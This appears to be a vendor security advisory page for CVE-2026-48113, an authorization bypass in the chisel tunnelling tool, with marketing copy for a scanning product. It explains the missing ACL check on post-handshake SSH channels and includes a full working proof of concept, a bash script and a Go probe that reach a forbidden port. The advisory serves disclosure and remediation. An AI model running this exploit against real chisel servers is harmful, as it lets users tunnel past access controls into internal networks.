CVE-2026-48113

CVE-2026-48113 is a high-severity incorrect authorization vulnerability in github.com/jpillora/chisel (go), affecting versions <= 1.11.4. It is fixed in 1.11.5.

Does this CVE actually affect you?

Kodem shows which CVEs are reachable and running in your applications, so you fix what's exploitable, not just what's listed.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Runtime intelligence, not another scanner.

Summary

Chisel has an ACL Bypass via Post-Handshake SSH Channel ExtraData Injection

Authenticated chisel clients can bypass --authfile ACL restrictions and tunnel traffic to arbitrary destinations reachable from the server. The ACL is enforced only during the initial handshake against declared remotes, but never on subsequent SSH channels that carry actual traffic. A malicious client authenticates with a permitted remote, then opens channels to any host:port it wants.

Details

The chisel server validates user ACLs in two places but is missing validation in one of the important places.

The server/server_handler.go checks the ACL, during the initial config handshake:

for _, r := range c.Remotes {
    if user != nil {
        addr := r.UserAddr()
        if !user.HasAccess(addr) {
            failed(s.Errorf("access to '%s' denied", addr))
            return
        }
    }
}
r.Reply(true, nil)

This validates the declared remote list from the client's config request. It runs once, at connection setup. But in share/tunnel/tunnel_out_ssh.go ACL aren't being checked, when the server processes actual traffic channels:

func (t *Tunnel) handleSSHChannel(ch ssh.NewChannel) {
    remote := string(ch.ExtraData())        // client-controlled
    hostPort, proto := settings.L4Proto(remote)
    sshChan, reqs, err := ch.Accept()       // accepted unconditionally
    // ...
    err = t.handleTCP(l, stream, hostPort)  // dials whatever client said
}

func (t *Tunnel) handleTCP(l *cio.Logger, src io.ReadWriteCloser, hostPort string) error {
    dst, err := net.Dial("tcp", hostPort)   // no ACL check
    // ...
}

The tunnel.Config struct has no User field, no allowed-address list, and no ACL callback. The user context from server_handler.go is never propagated to the tunnel layer:

type Config struct {
    *cio.Logger
    Inbound   bool
    Outbound  bool
    Socks     bool
    KeepAlive time.Duration
    // ------- No User, no AllowedRemotes, no ACL
}

Since ch.ExtraData() is fully controlled by the SSH client, any authenticated user can open channels to arbitrary destinations after passing the handshake with a permitted remote.

PoC

Directory structure format:

poc
├── poc.sh
└── probe
    ├── go.mod
    ├── go.sum
    └── main.go
  • poc.sh
#!/usr/bin/env bash

# Requires: Go, nc (netcat)

set -euo pipefail
DIR="$(cd "$(dirname "$0")" && pwd)"
REPO="$DIR/.."

freeport() { python3 -c "import socket;s=socket.socket();s.bind(('',0));print(s.getsockname()[1]);s.close()"; }
cleanup() { kill $SERVER $LISTENER 2>/dev/null; rm -f "$AUTH"; }
trap cleanup EXIT

# Build
echo "[*] Building..."
(cd "$REPO"       && go build -o /tmp/_chisel .)
(cd "$DIR/probe"  && go build -o /tmp/_probe  .)

# Ports
SP=$(freeport); AP=$(freeport); BP=$(freeport)
echo "[*] Server :$SP  Allowed :$AP  Blocked :$BP"

# Authfile, user:pass may only reach 127.0.0.1:$AP
AUTH=$(mktemp)
printf '{"user:pass":["^127\\\\.0\\\\.0\\\\.1:%s$"]}\n' "$AP" > "$AUTH"

# Start forbidden-target listener and chisel server
(echo "FORBIDDEN_TARGET_REACHED" | nc -l 127.0.0.1 "$BP") & LISTENER=$!
/tmp/_chisel server --port "$SP" --authfile "$AUTH" --key seed 2>/dev/null & SERVER=$!
sleep 1

# Exploit
CHISEL_SERVER="127.0.0.1:$SP" ALLOWED_PORT="$AP" BLOCKED_PORT="$BP" /tmp/_probe
  • main.go
// Chisel ACL bypass probe. Authenticates with an allowed remote,
// then opens an SSH channel to a forbidden destination via ExtraData.
package main

import (
	"encoding/json"
	"fmt"
	"net"
	"net/http"
	"os"
	"time"

	"github.com/gorilla/websocket"
	"github.com/jpillora/chisel/share/cnet"
	"github.com/jpillora/chisel/share/settings"
	"golang.org/x/crypto/ssh"
)

func main() {
	server := os.Getenv("CHISEL_SERVER")
	allowed := os.Getenv("ALLOWED_PORT")
	blocked := os.Getenv("BLOCKED_PORT")

	// WebSocket → net.Conn
	ws, _, err := (&websocket.Dialer{
		HandshakeTimeout: 5 * time.Second,
		Subprotocols:     []string{"chisel-v3"},
	}).Dial("ws://"+server, http.Header{})
	check(err, "ws dial")
	conn := cnet.NewWebSocketConn(ws)

	// SSH handshake
	sc, chans, reqs, err := ssh.NewClientConn(conn, "", &ssh.ClientConfig{
		User:            "user",
		Auth:            []ssh.AuthMethod{ssh.Password("pass")},
		HostKeyCallback: ssh.InsecureIgnoreHostKey(),
	})
	check(err, "ssh")
	go ssh.DiscardRequests(reqs)
	go func() { for c := range chans { c.Reject(ssh.Prohibited, "") } }()

	// Send config with only the allowed remote
	r, _ := settings.DecodeRemote(fmt.Sprintf("0.0.0.0:%s:127.0.0.1:%s", allowed, allowed))
	cfg, _ := json.Marshal(settings.Config{Version: "0", Remotes: []*settings.Remote{r}})
	ok, reply, err := sc.SendRequest("config", true, cfg)
	check(err, "config")
	if !ok {
		die("config rejected: %s", reply)
	}
	fmt.Printf("[+] Config accepted (only 127.0.0.1:%s allowed)\n", allowed)

	// Open channel to BLOCKED destination
	target := net.JoinHostPort("127.0.0.1", blocked)
	ch, cr, err := sc.OpenChannel("chisel", []byte(target))
	if err != nil {
		fmt.Printf("[-] REJECTED, server refused %s\n", target)
		os.Exit(1)
	}
	go ssh.DiscardRequests(cr)
	fmt.Printf("[!] ACCEPTED, channel opened to %s\n", target)

	// Read response from forbidden target
	buf := make([]byte, 256)
	done := make(chan int, 1)
	go func() { n, _ := ch.Read(buf); done <- n }()
	select {
	case n := <-done:
		if n > 0 {
			fmt.Printf("[!] Data: %s\n", buf[:n])
		}
	case <-time.After(3 * time.Second):
	}
	fmt.Println("CONFIRMED, ACL bypass: server dialed unauthorized destination")
	ch.Close()
	sc.Close()
}

func check(err error, ctx string) {
	if err != nil {
		die("%s: %v", ctx, err)
	}
}
func die(f string, a ...interface{}) {
	fmt.Fprintf(os.Stderr, f+"\n", a...)
	os.Exit(1)
}

Impact

  • Complete ACL bypass: The --authfile address restrictions are enforceable only on paper
  • Authenticated users can reach any host/port the server process can dial

The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions. Typical impact: unauthorized data access or execution of privileged operations.

Affected versions

github.com/jpillora/chisel (<= 1.11.4)

Security releases

github.com/jpillora/chisel → 1.11.5 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Already deployed Kodem?

See it in your environmentNew to Kodem? Get a demo →

Remediation advice

Upgrade github.com/jpillora/chisel to 1.11.5 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-48113? CVE-2026-48113 is a high-severity incorrect authorization vulnerability in github.com/jpillora/chisel (go), affecting versions <= 1.11.4. It is fixed in 1.11.5. The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions.
  2. Which versions of github.com/jpillora/chisel are affected by CVE-2026-48113? github.com/jpillora/chisel (go) versions <= 1.11.4 is affected.
  3. Is there a fix for CVE-2026-48113? Yes. CVE-2026-48113 is fixed in 1.11.5. Upgrade to this version or later.
  4. Is CVE-2026-48113 exploitable, and should I be worried? Whether CVE-2026-48113 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether CVE-2026-48113 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-48113? Upgrade github.com/jpillora/chisel to 1.11.5 or later.

Other vulnerabilities in github.com/jpillora/chisel

Stop the waste.
Protect your environment with Kodem.